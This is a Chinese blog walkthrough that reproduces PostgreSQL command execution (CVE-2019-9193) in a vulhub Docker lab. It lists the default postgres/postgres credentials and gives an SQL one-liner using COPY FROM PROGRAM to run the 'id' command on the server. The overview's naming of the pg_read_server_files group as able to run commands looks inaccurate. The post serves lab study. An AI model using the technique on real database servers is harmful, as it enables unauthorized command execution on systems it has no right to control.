PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)复现

  • A+
所属分类:安全文章

简介

 

PostgreSQL( 读作 Post-Gres-Q-L)是一个功能非常强大的、源代码开放的客户/服务器关系型数据库管理系统(RDBMS)。采用类似MIT的许可协议,允许开发人员做任何事情,包括在开源或闭源产品中商用,其源代码是免费提供的。

 

影响版本


9.3-11.2



漏洞概述


PostgreSQL是一个功能强大对象关系数据库管理系统(ORDBMS)。由于9.3增加一个“COPY TO/FROM PROGRAM”功能。这个功能就是允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令。

 

环境搭建

 

进入目录并启动环境

cd vulhub-master/postgres/CVE-2019-9193/docker-compose up -d

PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)复现

环境启动后,将开启Postgres默认的5432端口,默认账号密码为postgres/postgres。


漏洞复现

 

首先连接到postgres中

psql --host 192.168.204.136  --username postgres


执行如下语句,FROM PROGRAM语句将执行命令id并将结果保存在cmd_exec表中:

DROP TABLE IF EXISTS cmd_exec;CREATE TABLE cmd_exec(cmd_output text);COPY cmd_exec FROM PROGRAM 'id';SELECT * FROM cmd_exec;

PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)复现

成功执行命令

 

修复建议

 

升级到安全版本


本文始发于微信公众号(锋刃科技):PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: